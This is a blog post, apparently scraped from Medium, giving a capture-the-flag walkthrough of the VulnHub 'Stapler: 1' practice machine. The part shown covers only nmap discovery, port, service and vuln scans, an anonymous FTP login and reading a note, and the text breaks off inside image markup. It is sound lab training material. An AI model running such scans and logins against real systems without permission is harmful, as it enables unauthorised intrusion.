{"id":1081,"date":"2021-05-24T01:35:36","date_gmt":"2021-05-23T17:35:36","guid":{"rendered":"https:\/\/byy3.com\/?p=1081"},"modified":"2021-05-24T01:35:36","modified_gmt":"2021-05-23T17:35:36","slug":"vulnhub-stapler-1","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1081","title":{"rendered":"VulnHub: STAPLER: 1"},"content":{"rendered":"<p>VulnHub: STAPLER: 1<\/p>\n<article>\n<section class=\"dm fi fj dh fk\">\n<div class=\"n p\">\n<div class=\"ap aq ar as at fl av w\">\n<div class=\"\">\n<div class=\"cw\">\n<div class=\"n cj gk gl gm\">\n<div class=\"o n\">\n<div><img loading=\"lazy\" decoding=\"async\" class=\"s gn go gp\" data-original=\"https:\/\/miro.medium.com\/fit\/c\/42\/42\/2*sRvlfQPPEHj0473MlpWIng.jpeg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"28\" height=\"28\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe\" \/><\/div>\n<div class=\"dy w n ct\">\n<div class=\"n\">\n<div class=\"bv\" role=\"tooltip\" aria-hidden=\"false\" aria-describedby=\"96\" aria-labelledby=\"96\">\n<p class=\"ba b bb bc bd\">Apr 9<span class=\"gr\">\u00b7<\/span>10 min read<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"n cs gs gt gu gv gw gx gy gz\">\n<div class=\"n o\">\n<div class=\"ha s\">\n<div class=\"bv\" aria-hidden=\"false\" aria-describedby=\"postFooterSocialMenu\" aria-labelledby=\"postFooterSocialMenu\">\n<div>\n<div class=\"bv\" role=\"tooltip\" aria-hidden=\"false\" aria-describedby=\"97\" aria-labelledby=\"97\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"hb s\">\n<div class=\"wx\">Link: <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/www.vulnhub.com\/entry\/stapler-1,150\/\" rel=\"noopener nofollow\" rel=\"nofollow\" >https:\/\/www.vulnhub.com\/entry\/stapler-1,150\/<\/a><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p id=\"25f1\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><strong class=\"if cz\">Initial foothold<\/strong><\/p>\n<ol class=\"\">\n<li id=\"c26a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja jb jc jd gj\" data-selectable-paragraph=\"\">Network discovery<\/li>\n<\/ol>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"766c\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nmap -sn 10.0.2.32\/24<\/span><\/pre>\n<p id=\"e79a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">My target is 10.0.2.31.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev afl\">\n<div class=\"kc s ao kd\">\n<div class=\"afm kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*s6YhvZJRgD0tzxsbJ5jfhA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"726\" height=\"419\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe1\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe1\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1089\/1*s6YhvZJRgD0tzxsbJ5jfhA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*s6YhvZJRgD0tzxsbJ5jfhA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*s6YhvZJRgD0tzxsbJ5jfhA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*s6YhvZJRgD0tzxsbJ5jfhA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*s6YhvZJRgD0tzxsbJ5jfhA.png 700w\" width=\"726\" height=\"419\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe2\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe2\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"5517\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">2. Port scan<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"8e99\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nmap -Pn 10.0.2.31<\/span><span id=\"ee41\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">nmap -Pn -p1000- 10.0.2.31<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev afn\">\n<div class=\"kc s ao kd\">\n<div class=\"afo kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*c29rgOxJ3mCx8MdiUEqlfg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1060\" height=\"778\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe3\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe3\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1590\/1*c29rgOxJ3mCx8MdiUEqlfg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*c29rgOxJ3mCx8MdiUEqlfg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*c29rgOxJ3mCx8MdiUEqlfg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*c29rgOxJ3mCx8MdiUEqlfg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*c29rgOxJ3mCx8MdiUEqlfg.png 700w\" width=\"1060\" height=\"778\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe4\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe4\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"58ac\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">3. OS and service scan<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"e861\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nmap -A -p20,21,22,53,80,139,666,3306,12380 10.0.2.31<\/span><\/pre>\n<p id=\"062f\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019re services as listed:<\/p>\n<ul class=\"\">\n<li id=\"9507\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 21 vsftpd w\/ anonymous login<\/li>\n<li id=\"9bca\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)<\/li>\n<li id=\"7bfe\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 53 dnsmasq 2.75<\/li>\n<li id=\"e1a8\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 80 PHP cli server 5.5 or later<\/li>\n<li id=\"8b81\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)<\/li>\n<li id=\"efef\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 666 doom<\/li>\n<li id=\"03b0\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 3306 MySQL 5.7.12\u20130ubuntu1<\/li>\n<li id=\"42ab\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 12380 Apache httpd 2.4.18 ((Ubuntu))<\/li>\n<\/ul>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev afu\">\n<div class=\"kc s ao kd\">\n<div class=\"afv kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*ejB2nuSnMb3thU2I5YX2_w.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1027\" height=\"654\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe5\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe5\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1541\/1*ejB2nuSnMb3thU2I5YX2_w.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*ejB2nuSnMb3thU2I5YX2_w.png 276w, https:\/\/miro.medium.com\/max\/828\/1*ejB2nuSnMb3thU2I5YX2_w.png 552w, https:\/\/miro.medium.com\/max\/960\/1*ejB2nuSnMb3thU2I5YX2_w.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*ejB2nuSnMb3thU2I5YX2_w.png 700w\" width=\"1027\" height=\"654\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe6\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe6\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev afw\">\n<div class=\"kc s ao kd\">\n<div class=\"afx kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*cDUD3RazBaGndBHYbpdBCg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"862\" height=\"502\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe7\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe7\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1293\/1*cDUD3RazBaGndBHYbpdBCg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*cDUD3RazBaGndBHYbpdBCg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*cDUD3RazBaGndBHYbpdBCg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*cDUD3RazBaGndBHYbpdBCg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*cDUD3RazBaGndBHYbpdBCg.png 700w\" width=\"862\" height=\"502\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe8\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe8\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev afy\">\n<div class=\"kc s ao kd\">\n<div class=\"afz kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*BW0M-_reaTRUvPvX92iB6g.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"880\" height=\"411\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe9\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe9\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1320\/1*BW0M-_reaTRUvPvX92iB6g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*BW0M-_reaTRUvPvX92iB6g.png 276w, https:\/\/miro.medium.com\/max\/828\/1*BW0M-_reaTRUvPvX92iB6g.png 552w, https:\/\/miro.medium.com\/max\/960\/1*BW0M-_reaTRUvPvX92iB6g.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*BW0M-_reaTRUvPvX92iB6g.png 700w\" width=\"880\" height=\"411\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe10\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe10\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aga\">\n<div class=\"kc s ao kd\">\n<div class=\"agb kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*-Z1LPVEeQT9cCVkKpvbw4g.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"973\" height=\"693\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe11\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe11\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1460\/1*-Z1LPVEeQT9cCVkKpvbw4g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*-Z1LPVEeQT9cCVkKpvbw4g.png 276w, https:\/\/miro.medium.com\/max\/828\/1*-Z1LPVEeQT9cCVkKpvbw4g.png 552w, https:\/\/miro.medium.com\/max\/960\/1*-Z1LPVEeQT9cCVkKpvbw4g.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*-Z1LPVEeQT9cCVkKpvbw4g.png 700w\" width=\"973\" height=\"693\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe12\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe12\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"5ae7\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">4. Vuln scan<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"8cd5\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nmap --script vuln -p20,21,22,53,80,139,666,3306,12380 10.0.2.31<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agc\">\n<div class=\"kc s ao kd\">\n<div class=\"agd kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*IJvn5zaYVWOZtWvJWRGE_Q.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1002\" height=\"739\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe13\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe13\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1503\/1*IJvn5zaYVWOZtWvJWRGE_Q.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*IJvn5zaYVWOZtWvJWRGE_Q.png 276w, https:\/\/miro.medium.com\/max\/828\/1*IJvn5zaYVWOZtWvJWRGE_Q.png 552w, https:\/\/miro.medium.com\/max\/960\/1*IJvn5zaYVWOZtWvJWRGE_Q.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*IJvn5zaYVWOZtWvJWRGE_Q.png 700w\" width=\"1002\" height=\"739\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe14\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe14\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev age\">\n<div class=\"kc s ao kd\">\n<div class=\"agf kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*tXeWWZnsbohuuuRvMT6GGw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1384\" height=\"659\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe15\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe15\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2076\/1*tXeWWZnsbohuuuRvMT6GGw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*tXeWWZnsbohuuuRvMT6GGw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*tXeWWZnsbohuuuRvMT6GGw.png 552w, https:\/\/miro.medium.com\/max\/960\/1*tXeWWZnsbohuuuRvMT6GGw.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*tXeWWZnsbohuuuRvMT6GGw.png 700w\" width=\"1384\" height=\"659\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe16\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe16\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<\/div>\n<\/div>\n<\/section>\n<div class=\"n p cw kw kx ky\" role=\"separator\"><\/div>\n<section class=\"dm fi fj dh fk\">\n<div class=\"n p\">\n<div class=\"ap aq ar as at fl av w\">\n<p id=\"1e08\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><strong class=\"if cz\">Initial enumeration\/searching existing exploits of each service<\/strong><\/p>\n<ul class=\"\">\n<li id=\"52fa\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 21 vsftpd 3.0.3 w\/ anonymous login<\/li>\n<\/ul>\n<p id=\"82de\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There aren\u2019t any public exploits that I can use.<\/p>\n<p id=\"0c55\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Login w\/ anonymous<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"08e6\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ftp 10.0.2.31<\/span><span id=\"4ce0\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">username: anonymous<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agg\">\n<div class=\"kc s ao kd\">\n<div class=\"agh kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*-SIH4GJ2lCyf3smwY92gLg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1064\" height=\"391\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe17\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe17\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1596\/1*-SIH4GJ2lCyf3smwY92gLg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*-SIH4GJ2lCyf3smwY92gLg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*-SIH4GJ2lCyf3smwY92gLg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*-SIH4GJ2lCyf3smwY92gLg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*-SIH4GJ2lCyf3smwY92gLg.png 700w\" width=\"1064\" height=\"391\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe18\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe18\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"f15b\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">List files<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"5446\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ls -la<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev agi\">\n<div class=\"kc s ao kd\">\n<div class=\"agj kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*3ooPNYQ48HJxBDFpf_lIjQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"676\" height=\"217\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe19\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe19\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1014\/1*3ooPNYQ48HJxBDFpf_lIjQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 676px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*3ooPNYQ48HJxBDFpf_lIjQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*3ooPNYQ48HJxBDFpf_lIjQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*3ooPNYQ48HJxBDFpf_lIjQ.png 640w, https:\/\/miro.medium.com\/max\/1014\/1*3ooPNYQ48HJxBDFpf_lIjQ.png 676w\" width=\"676\" height=\"217\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe20\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe20\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"b32a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Download it<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"0bf0\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">get note<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agk\">\n<div class=\"kc s ao kd\">\n<div class=\"agl kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*lVvc2dDob8CDtq_IXRy8kA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"701\" height=\"194\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe21\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe21\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1052\/1*lVvc2dDob8CDtq_IXRy8kA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*lVvc2dDob8CDtq_IXRy8kA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*lVvc2dDob8CDtq_IXRy8kA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*lVvc2dDob8CDtq_IXRy8kA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*lVvc2dDob8CDtq_IXRy8kA.png 700w\" width=\"701\" height=\"194\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe22\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe22\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"f908\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read it<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"0ce2\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat note<\/span><\/pre>\n<p id=\"3cbb\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Elly has FTP account.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agm\">\n<div class=\"kc s ao kd\">\n<div class=\"agn kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*wNJn91ILexpAhyRNTyrxgA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1185\" height=\"98\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe23\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe23\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1778\/1*wNJn91ILexpAhyRNTyrxgA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" 